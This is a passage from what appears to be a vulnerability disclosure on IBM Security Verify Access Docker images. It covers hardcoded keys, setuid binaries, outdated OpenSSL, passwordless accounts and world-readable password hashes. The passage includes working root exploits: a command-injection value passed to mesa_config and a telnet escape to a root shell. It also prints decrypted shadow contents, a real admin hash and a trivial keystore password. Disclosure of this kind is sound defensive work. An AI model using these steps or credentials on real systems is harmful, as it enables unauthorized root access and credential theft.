18:4e:79:08:35:bc:28:15:ac:23:0e:b5:28:23:c2:08:3d:6a:\n 39:5d:37:fa:60:13:ef:19:c3:7a:9c:db:f0:19:0c:ac:0d:d0:\n 51:b1:1b:ae:22:a4:b7:92:3b:ff:61:a3:0f:1c:6e:52:97:fe:\n 2d:65:cb:13\n Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D\n kali-docker# openssl rsa -in encKey.key -modulus -noout \n \n Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D\n kali-docker# \n\nIt is also possible to decrypt the `shadow.enc` file of a live instance using the hardcoded `device_key.kdb`:\n\n kali-docker# file shadow.enc \n shadow.enc: data\n kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/lib64:/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64 /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/sbin/isva_decrypt shadow.enc\n kali-docker# cat shadow.enc \n root:!!$6$[REDACTED]:19255:0:99999:7:::\n bin:*:18367:0:99999:7:::\n daemon:*:18367:0:99999:7:::\n adm:*:18367:0:99999:7:::\n lp:*:18367:0:99999:7:::\n sync:*:18367:0:99999:7:::\n shutdown:*:18367:0:99999:7:::\n halt:*:18367:0:99999:7:::\n mail:*:18367:0:99999:7:::\n operator:*:18367:0:99999:7:::\n games:*:18367:0:99999:7:::\n ftp:*:18367:0:99999:7:::\n nobody:*:18367:0:99999:7:::\n dbus:!!:19115::::::\n systemd-coredump:!!:19115::::::\n systemd-resolve:!!:19115::::::\n tss:!!:19115::::::\n postgres:!!:19151::::::\n ldap:!!:19151::::::\n admin:$6$[REDACTED]:19255:0:99999:7:::\n www-data:*:14251:0:99999:7:::\n ivmgr:!!:19151:0:99999:7:::\n cluster::19151:0:99999:7:::\n pgresql:!!:19151:0:99999:7:::\n nfast:!!:19151:0:99999:7:::\n tivoli:!!:19151:0:99999:7:::\n isam:!!:19151:1:90:7:::\n\n\nAn attacker can easily decrypt the encrypted files inside the snapshot files. These snapshots contain an `openldap.zip` file containing the OpenLDAP configuration, keytabs, passwords, SSL certificates and private keys. \n\nThe encryption mechanism, based on hardcoded keys, is ineffective and provides a false assumption of security. \n\n\n\n## Details - Local Privilege Escalation using OpenLDAP\n\nIt was observed that the official IBM Docker image ibmcom/verify-access contains a Local Privilege Escalation vulnerability. \n\nThe binary `slapd`, used to run OpenLDAP has incorrect permissions, allowing any user to run `slapd` as root. An attacker can run `slapd` as root and specify a malicious configuration file that will run code as root. \n\nUsing a static analysis, the file system has been extracted and the `usr/sbin/slapd` program is `root:$group` and `4755`:\n\n kali-docker# docker images\n REPOSITORY TAG IMAGE ID CREATED SIZE\n ibmcom/verify-access-runtime 10.0.4.0 498e181d7395 3 months ago 1.07GB\n ibmcom/verify-access-wrp 10.0.4.0 c0003aca743c 3 months ago 442MB\n ibmcom/verify-access 10.0.4.0 206efdd7809c 3 months ago 1.53GB\n ibmcom/verify-access-dsc 10.0.4.0 959f6f1095e9 3 months ago 305MB\n \n kali-docker# ls -la _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd\n -rwsr-sr-x 1 root user 1916768 Jun 8 01:30 _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd\n\nWhile checking on a live system, we can confirm the permissions `4755` (suid bit) are used in the verify-access instance. The owner is `root:ivmgr`:\n\n [isam@verify-access log]$ ls -la /usr/sbin/slapd\n -rwsr-sr-x 1 root ivmgr 1916768 Jun 8 13:30 /usr/sbin/slapd\n [isam@verify-access log]$\n\nBy default, `slapd` allows to load external modules (to execute code). These .la files contain information about shared libraries that will be loaded within slapd. \n\nContent of `/etc/openldap/slapd.conf`:\n\n # Load dynamic backend modules:\n # modulepath /usr/lib/openldap\n # moduleload back_bdb.la\n # moduleload back_ldap.la\n # moduleload back_ldbm.la\n # moduleload back_passwd.la\n # moduleload back_shell.la\n moduleload syncprov.la\n\nIt is possible to load malicious modules as root using a specific configuration .la file. This will allow a local attacker to get a Local Privilege Escalation as root. For example, we can find a default file that we can change into a malicious file by updating the libdir option to another directory:\n\n kali-docker# cat _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/usr/lib64/openldap/syncprov.la\n # syncprov.la - a libtool library file\n # Generated by libtool (GNU libtool) 2.4.6\n #\n # Please DO NOT delete this file!\n # It is necessary for linking the library. \n \n # The name that we can dlopen(3). \n dlname=\u0027syncprov-2.4.so.2\u0027\n \n # Names of this library. \n library_names=\u0027syncprov-2.4.so.2.11.4 syncprov-2.4.so.2 syncprov.so\u0027\n [...]\n # Files to dlopen/dlpreopen\n dlopen=\u0027\u0027\n dlpreopen=\u0027\u0027\n \n # Directory that this library needs to be installed in:\n libdir=\u0027/usr/lib64/openldap\u0027\n\n\n\n## Details - Local Privilege Escalation using rpm\n\nThe binary npm has incorrect permissions in the ibmcom/verify-access instance, allowing any user to run rpm as root. \n\nUsing a static analysis, with the file system that has been extracted - the `usr/bin/rpm` program is `root:root` and `4755`:\n\n kali-extraction-docker# docker images\n REPOSITORY TAG IMAGE ID CREATED SIZE\n ibmcom/verify-access-runtime 10.0.4.0 498e181d7395 3 months ago 1.07GB\n ibmcom/verify-access-wrp 10.0.4.0 c0003aca743c 3 months ago 442MB\n ibmcom/verify-access 10.0.4.0 206efdd7809c 3 months ago 1.53GB\n ibmcom/verify-access-dsc 10.0.4.0 959f6f1095e9 3 months ago 305MB\n \n kali-extraction-docker# ls -la ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm \n -rwsr-sr-x 1 root root 21336 Apr 5 14:38 ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm\n\nWhile checking on a live system, we can confirm the permissions `4755` (suid bit) are used in the verify-access docker image. The file belongs to `root:root`:\n\n [isam@verify-access /]$ ls -la /usr/bin/rpm\n -rwsr-sr-x 1 root root 21336 Apr 6 02:38 /usr/bin/rpm\n [isam@verify-access /]$ /usr/bin/rpm\n RPM version 4.14.3\n Copyright (C) 1998-2002 - Red Hat, Inc. \n This program may be freely redistributed under the terms of the GNU GPL\n \n Usage: rpm [-afgpcdLAlsiv?] [-a|--all] [-f|--file] [--path] [-g|--group] [-p|--package] [--pkgid] [--hdrid] [--triggeredby] [--whatconflicts] [--whatrequires] [--whatobsoletes] [--whatprovides] [--whatrecommends]\n [--whatsuggests] [--whatsupplements] [--whatenhances] [--nomanifest] [-c|--configfiles] [-d|--docfiles] [-L|--licensefiles] [-A|--artifactfiles] [--dump] [-l|--list] [--queryformat=QUERYFORMAT] [-s|--state]\n [--nofiledigest] [--nofiles] [--nodeps] [--noscript] [--allfiles] [--allmatches] [--badreloc] [-e|--erase=\u003cpackage\u003e+] [--excludedocs] [--excludepath=\u003cpath\u003e] [--force] [-F|--freshen=\u003cpackagefile\u003e+] [-h|--hash]\n [--ignorearch] [--ignoreos] [--ignoresize] [--noverify] [-i|--install] [--justdb] [--nodeps] [--nofiledigest] [--nocontexts] [--nocaps] [--noorder] [--noscripts] [--notriggers] [--oldpackage] [--percent]\n [--prefix=\u003cdir\u003e] [--relocate=\u003cold\u003e=\u003cnew\u003e] [--replacefiles] [--replacepkgs] [--test] [-U|--upgrade=\u003cpackagefile\u003e+] [--reinstall=\u003cpackagefile\u003e+] [-D|--define=\u0027MACRO EXPR\u0027] [--undefine=MACRO] [-E|--eval=\u0027EXPR\u0027]\n [--target=CPU-VENDOR-OS] [--macros=\u003cFILE:...\u003e] [--noplugins] [--nodigest] [--nosignature] [--rcfile=\u003cFILE:...\u003e] [-r|--root=ROOT] [--dbpath=DIRECTORY] [--querytags] [--showrc] [--quiet] [-v|--verbose]\n [--version] [-?|--help] [--usage] [--scripts] [--setperms] [--setugids] [--setcaps] [--restore] [--conflicts] [--obsoletes] [--provides] [--requires] [--recommends] [--suggests] [--supplements]\n [--enhances] [--info] [--changelog] [--changes] [--xml] [--triggers] [--filetriggers] [--last] [--dupes] [--filesbypkg] [--fileclass] [--filecolor] [--fileprovide] [--filerequire] [--filecaps]\n [isam@verify-access /]$\n\nAn attacker can run rpm as root to add or remove any package in the system, providing a full root access. \n\n\n\n## Details - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes\n\nIt was observed that the official IBM Docker ibmcom/verify-access image contains several binaries with incorrect permissions (`4755` - suid bit, with `root:root` or `root:ivmgr` as ownership) allowing any local user to run these programs as root: \n\n- - /opt/PolicyDirector/bin/pdmgrd\n- - /opt/pdweb/bin/webseald\n- - /usr/bin/rpm\n- - /usr/sbin/slapd\n- - /usr/sbin/mesa_config\n- - /usr/sbin/mesa_cli\n- - /usr/sbin/mesa_control\n- - /usr/sbin/mesa_lcd\n- - /usr/sbin/mesa_stats\n\nBinaries with the suid bit:\n\n [isam@verify-access]$ ls -la /usr/sbin/slapd\n -rwsr-sr-x 1 root ivmgr 1916768 Jun 8 13:30 /usr/sbin/slapd\n [isam@verify-access]$ ls -la /usr/sbin/mesa_lcd\n -rwsr-xr-x 1 root root 57240 Jun 8 13:29 /usr/sbin/mesa_lcd\n [isam@verify-access]$ ls -la /usr/sbin/mesa_control\n -rwsr-xr-x 1 root root 98448 Jun 8 13:29 /usr/sbin/mesa_control\n [isam@verify-access]$ ls -la /usr/sbin/mesa_config\n -rwsr-sr-x 1 root root 2975680 Jun 8 13:29 /usr/sbin/mesa_config\n [isam@verify-access]$ ls -la /usr/sbin/mesa_stats\n -rwsr-xr-x 1 root root 11176 Jun 8 13:13 /usr/sbin/mesa_stats\n [isam@verify-access]$ ls -la /usr/sbin/mesa_cli\n -rwsr-xr-x 1 root root 436160 Jun 8 13:29 /usr/sbin/mesa_cli\n [isam@verify-access]$ ls -la /usr/bin/rpm\n -rwsr-sr-x 1 root root 21336 Apr 6 02:38 /usr/bin/rpm\n [isam@verify-access]$ ls -la /opt/PolicyDirector/bin/pdmgrd\n -r-sr-sr-x 1 root ivmgr 32040 Jun 8 13:30 /opt/PolicyDirector/bin/pdmgrd\n [isam@verify-access]$ ls -la /opt/pdweb/bin/webseald\n -r-sr-s--- 1 root ivmgr 29296 Jun 8 13:30 /opt/pdweb/bin/webseald\n [isam@verify-access]$ ls -la /opt/dsc/bin/dscd\n -r-sr-s--- 1 ivmgr ivmgr 24264 Jun 8 13:30 /opt/dsc/bin/dscd\n\nFour trivial Local Privilege Escalations were found using the suid bit. Some additional LPEs may also exist in these programs. Trivial LPEs can be found everywhere in the mesa_* programs. \n\nAn attacker can get Local Privilege Escalations as root inside instances based on the ibmcom/verify-access image. \n\nThe code of `mesa_*` programs contains several trivial vulnerabilities due to the use of the `MesaSystem` function (and its derivatives) found in the `libwsmesa.so` library. This function is an insecure wrapper to the `execv()` function using the arguments `/bin/sh -c` and attacker-controlled values. The use of `/bin/sh -c` allows command injections. \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n\n\n## Details - Local Privilege Escalation using mesa_config - import of a new snapshot\n\nThe `mesa_config` program allows importing a new snapshot. This allows an attacker to get a Local Privilege Escalation as root by importing a new snapshot:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe function `MainApplySnapshot` will install the new malicious snapshot as root:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n\n\n## Details - Local Privilege Escalation using mesa_config - command injections\n\nExploiting the `fips_zeroize_files` option in the `mesa_config` program will provide a root access. \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe following PoC will provide root privileges inside the current instance:\n\n [isam@verify-access /]$ id\n uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n [isam@verify-access /]$ cat /tmp/test.sh \n #!/bin/sh\n id \u003e /tmp/id-2\n \n [isam@verify-access /]$ ls -la /tmp/id-2\n ls: cannot access \u0027/tmp/id-2\u0027: No such file or directory\n [isam@verify-access /]$ /usr/sbin/mesa_config fips_zeroize_files \"AAAAAAAAAAAAAAAAAAAAAAAA;/tmp/test.sh\"\n [isam@verify-access /]$ ls -la /tmp/id-2\n -rw-rw-r-- 1 root root 102 Oct 13 21:32 /tmp/id-2\n [isam@verify-access /]$ cat /tmp/id-2\n uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n [isam@verify-access /]$\n\n\n\n## Details - Local Privilege Escalation using mesa_cli - import of a new snapshot\n\nThe main_cli program is also vulnerable to LPE. This tool allows managing the instance from any user:\n\n [isam@verify-access]$ mesa_cli\n Welcome to the IBM Security Verify Access appliance\n Enter \"help\" for a list of available commands\n verify-access\u003e help\n Current mode commands:\n diagnostics Work with the IBM Security Verify Access diagnostics. \n extensions List and remove extensions installed on the appliance. \n fips View FIPS 140-2 state and events. \n fixpacks Work with fix packs. \n isam Work with the IBM Security Verify Access settings. \n license Work with licenses. \n lmi Work with the local management interface. \n lmt Work with the license metric tool. \n management Work with management settings. \n pending_changes Work with the IBM Security Verify Access pending\n changes. \n snapshots Work with policy snapshot files. \n support Work with support information files. \n tools Work with network diagnostic tools. \n Global commands:\n back Return to the previous command mode. \n exit Log off from the appliance. \n help Display information for using the specified command. \n reload Reload the container configuration. \n shutdown End system operation and turn off the power. \n state Display the current state of the container. \n top Return to the top level. \n verify-access\u003e snapshots\n verify-access:snapshots\u003e help\n Current mode commands:\n apply Apply a policy snapshot file to the system. \n create Create a snapshot of current policy files. \n delete Delete a policy snapshot file. \n get_comment View the comment associated with a policy snapshot file. \n list List the policy snapshot files. \n set_comment Replace the comment associated with a policy snapshot\n file. \n Global commands:\n back Return to the previous command mode. \n exit Log off from the appliance. \n help Display information for using the specified command. \n reload Reload the container configuration. \n shutdown End system operation and turn off the power. \n state Display the current state of the container. \n top Return to the top level. \n verify-access:snapshots\u003e exit\n [isam@verify-access /]$\n\nThe `apply` command inside the snapshots menu allows an attacker to install a new malicious snapshot as root and get a Local Privilege Escalation. \n\n\n\n## Details - Local Privilege Escalation using mesa_cli - telnet escape shell\n\nAnother LPE was found using the telnet client available within `mesa_cli`: it is possible to escape the telnet client using the `^]` keys and get a shell as root:\n\n [isam@verify-access /]$ id\n uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n [isam@verify-access /]$ mesa_cli\n Welcome to the IBM Security Verify Access appliance\n Enter \"help\" for a list of available commands\n verify-access\u003e tools\n verify-access:tools\u003e telnet test-server01.lan 22\n Trying 10.0.0.14... \n Connected to test-server01.lan. \n Escape character is \u0027^]\u0027. \n SSH-2.0-OpenSSH_8.0\n ^]\n telnet\u003e !sh\n sh-4.4# id\n uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n sh-4.4# touch /tmp/pwned-root\n sh-4.4# exit\n exit\n ^]\n telnet\u003e q\n Connection closed. \n verify-access:tools\u003e exit\n [isam@verify-access /]$ ls -la /tmp/pwned-root\n -rw-r--r-- 1 root root 0 Oct 13 22:21 /tmp/pwned-root\n [isam@verify-access /]$\n\nThe `sub_410330` function will `execv()` telnet through the `MesaSpawn` function:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n\n\n## Details - Outdated OpenSSL\n\nIt was observed that all the official IBM Docker images (ibmcom/verify-access-runtime, ibmcom/verify-access-wrp, ibmcom/verify-access and ibmcom/verify-access-dsc) contain the outdated OpenSSL package openssl-1.1.1k-6.el8_5.x86_64. This package contains several vulnerabilities that were patched in August 2022. \n\nAt the time of the analysis (28 October 2022), these vulnerabilities were patched by Red Hat but the official IBM Docker images were still vulnerable. \n\nAnalysis of the libssl.so.1.1.1k files found in the 4 Docker images:\n\n kali-docker# sha256sum **/libssl.so.1.1.1k \n 2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n 2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n 2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k\n 2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10 _verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n \n kali-docker# strings ./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k|grep 1.1.1\n OPENSSL_1_1_1\n OPENSSL_1_1_1a\n OpenSSL 1.1.1k FIPS 25 Mar 2021\n libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64.debug\n\nWe can confirm the OpenSSL version is provided by the package libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64. \n\nThe security announcement from Redhat patching vulnerabilities in the version libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64 is RHSA-2022:5818-01 (https://access.redhat.com/errata/RHSA-2022:5818). \n\nThe packages patching the vulnerabilities are:\n\n- - openssl-1.1.1k-7.el8_6.x86_64.rpm\n- - openssl-debuginfo-1.1.1k-7.el8_6.i686.rpm\n- - [...]\n\nWith access to live systems, we can confirm that the patches have not been applied and the systems are still vulnerable:\n\n [root@container-01]# podman ps\n CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES\n 413823e2f7d1 ibmcom/verify-access/10.0.4.0:20220926.6 4 hours ago Up 4 hours ago (healthy) 0.0.0.0:7443-\u003e9443/tcp verify-access\n a2142514d831 ibmcom/verify-access-runtime/10.0.4.0:20220926.6 4 hours ago Up 4 hours ago (healthy) 0.0.0.0:9443-\u003e9443/tcp verify-access-runtime\n e0c55b6440cf ibmcom/verify-access-dsc/10.0.4.0:20220926.6 4 hours ago Up 4 hours ago (healthy) 0.0.0.0:8443-8444-\u003e8443-8444/tcp verify-access-dsc\n [root@container-01]# for i in 413823e2f7d1 a2142514d831 e0c55b6440cf; do podman exec -it $i bash -c \u0027rpm -qa|grep -i openssl\u0027;echo;done\n openssl-1.1.1k-6.el8_5.x86_64\n openssl-libs-1.1.1k-6.el8_5.x86_64\n apr-util-openssl-1.6.1-6.el8.x86_64\n \n openssl-libs-1.1.1k-6.el8_5.x86_64\n \n openssl-libs-1.1.1k-6.el8_5.x86_64\n openssl-1.1.1k-6.el8_5.x86_64\n\n\nThe official Docker images contain known vulnerabilities. \n\n\n\n## Details - PermitRootLogin set to yes\n\nIt was observed that the configuration file `/etc/sysconfig/sshd-permitrootlogin` will allow the connection from root in the Docker images:\n\n kali-docker# find . | grep sshd-permitrootlogin\n ./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/etc/sysconfig/sshd-permitrootlogin\n ./_verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n ./_verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n ./_verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n kali-docker# cat */*/etc/sysconfig/sshd-permitrootlogin\n # This file has been generated by the Anaconda Installer. \n # Allow root to log in using ssh. Remove this file to opt-out. \n PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n # This file has been generated by the Anaconda Installer. \n # Allow root to log in using ssh. Remove this file to opt-out. \n PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n # This file has been generated by the Anaconda Installer. \n # Allow root to log in using ssh. Remove this file to opt-out. \n PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n # This file has been generated by the Anaconda Installer. \n # Allow root to log in using ssh. Remove this file to opt-out. \n PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n\nIf a SSH server was installed inside the instances, it would be then possible to login as root. \n\n\n\n## Details - Lack of password for the `cluster` user\n\nIt was observed that the `cluster` user in the Docker image verify-access does not have a password defined in the `/etc/shadow` file:\n\n kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/passwd | grep cluster\n cluster:x:5003:1006::/home/cluster:/usr/sbin/wga_clustersh\n \n kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow | grep cluster \n cluster::19151:0:99999:7:::\n \n kali-docker# john --show _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow \n admin:admin:19151:0:99999:7:::\n cluster:NO PASSWORD:19151:0:99999:7:::\n \n 2 password hashes cracked, 0 left\n\n\nIn the live environment, it was confirmed that the user `cluster` does not have a password in the `verify-access` instance:\n\n [root@test-server 5ecd09e2d7bb10f3bec5b6be4c2298d6bdb54b70a75ce67944651b6b5330821e]# cat ./merged/etc/shadow | grep cluster\n cluster::19151:0:99999:7:::\n\nIf a SSH server was installed inside the instances, it would be then possible to login as cluster without a password. \n\nA user with a local access can get `cluster` privileges. \n\n\n\n## Details - Non-standard way of storing hashes and world-readable files containing hashes\n\nIt was observed that passwords are saved in 3 non-standard files in the Docker image verify-access:\n\n- - `/etc/shadow.isam`\n- - `/etc/admin.pwd`\n- - `/etc/wga_notifications.conf`\n\nFurthermore, the `/etc/shadow.isam` and `/etc/wga_notifications.conf` files are world-readable. \n\nWhen extracting verify-access, we can find the `/etc/shadow.isam` file:\n\n kali-docker# cat ./698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/shadow.isam\n admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::\n www-data:*:14251:0:99999:7:::\n ivmgr:!!:19151:0:99999:7:::\n cluster::19151:0:99999:7:::\n pgresql:!!:19151:0:99999:7:::\n nfast:!!:19151:0:99999:7:::\n tivoli:!!:19151:0:99999:7:::\n\nWhen checking on the live system (verify-access), we can find these 3 previous files, 2 of which are world-readable:\n\n [root@container-01]# podman ps | grep 413823e2f7d1\n 413823e2f7d1 ibmcom/verify-access/10.0.4.0:20220926.6 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:7443-\u003e9443/tcp verify-access\n [root@container-01]#\n \n [root@container-01]# podman ps|grep 413823e2f7d1\n 413823e2f7d1 ibmcom/verify-access/verify-access/10.0.4.0:20220926.6 25 hours ago Up 25 hours ago (healthy) 0.0.0.0:7443-\u003e9443/tcp verify-access\n [root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/wga_notifications.conf /etc/shadow.isam /etc/admin.pwd\n -rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd\n -rw-r--r-- 1 root root 305 Jun 8 13:43 /etc/shadow.isam\n -rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf\n [root@container-01]#\n\nFurthermore, we can extract passwords from these files. The hash in `/etc/shadow.isam` seems to be hardcoded (`admin`):\n\n [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/shadow.isam\n admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::\n www-data:*:14251:0:99999:7:::\n ivmgr:!!:19151:0:99999:7:::\n cluster::19151:0:99999:7:::\n pgresql:!!:19151:0:99999:7:::\n nfast:!!:19151:0:99999:7:::\n tivoli:!!:19151:0:99999:7:::\n \n [root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/admin.pwd\n -rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd\n [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/admin.pwd\n [REDACTED]\n \n [root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/wga_notifications.conf\n -rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf\n [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/wga_notifications.conf\n [...]\n sam_cluster.hvdb.driver_type = thin\n isam_cluster.hvdb.embedded = false\n isam_cluster.hvdb.port = 1536\n isam_cluster.hvdb.pwd = [REDACTED]\n isam_cluster.hvdb.secure = false\n [...]\n\n\nA local attacker can extract hashes from world-readable files and elevate its privileges. \n\nThe use of `/etc/shadow.isam` is unknown. \n\n\n\n## Details - Hardcoded PKCS#12 files\n\nIt was observed the Docker image verify-access contains hardcoded PKCS#12 files:\n\n- - /var/isam/cluster/sundry/odbc/ewallet.p12\n- - /var/pdweb/shared/keytab/lmi_trust_store.p12\n- - /var/pdweb/shared/keytab/embedded_ldap_keys.p12\n- - /var/pdweb/shared/keytab/rt_profile_keys.p12\n\nThe `/var/isam/cluster/sundry/odbc/ewallet.p12` file can be found inside the verify-access image:\n\n kali-docker# ls -la ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n -rw-r--r-- 1 5000 5000 736 Jun 8 01:32 ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n \n kali-docker# sha256sum ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n 687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5 ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n\nWhen checking on the live system (verify-access), we can find this unchanged file:\n\n [root@container-01]# podman ps | grep 413823e2f7d1\n 413823e2f7d1 ibmcom/verify-access/10.0.4.0:20220926.6 26 hours ago Up 26 hours ago (healthy) 0.0.0.0:7443-\u003e9443/tcp verify-access\n [root@container-01]# podman exec -it 413823e2f7d1 ls -la /var/isam/cluster/sundry/odbc/\n total 16\n drwxr-xr-x 2 www-data www-data 4096 Jun 8 13:43 . \n drwxr-xr-x 3 cluster cluster 4096 Jun 8 13:43 .. \n -rw-r--r-- 1 www-data www-data 781 Jun 8 13:32 cwallet.sso\n -rw-r--r-- 1 www-data www-data 0 Jun 8 13:32 cwallet.sso.lck\n -rw-r--r-- 1 www-data www-data 736 Jun 8 13:32 ewallet.p12\n -rw-r--r-- 1 www-data www-data 0 Jun 8 13:32 ewallet.p12.lck\n [root@container-01]# podman exec -it 413823e2f7d1 sha256sum /var/isam/cluster/sundry/odbc/ewallet.p12\n 687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5 /var/isam/cluster/sundry/odbc/ewallet.p12\n [root@container-01]#\n\nThis file is used by several programs, with a trivial password (`passw0rd`) to encrypt it:\n\nAssembly code of the function `authorSqlFuseFiles` found inside `mesa_config`, used to extract ewallet.p12:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nExtraction using OpenSSL:\n\n kali-docker# openssl pkcs12 -in 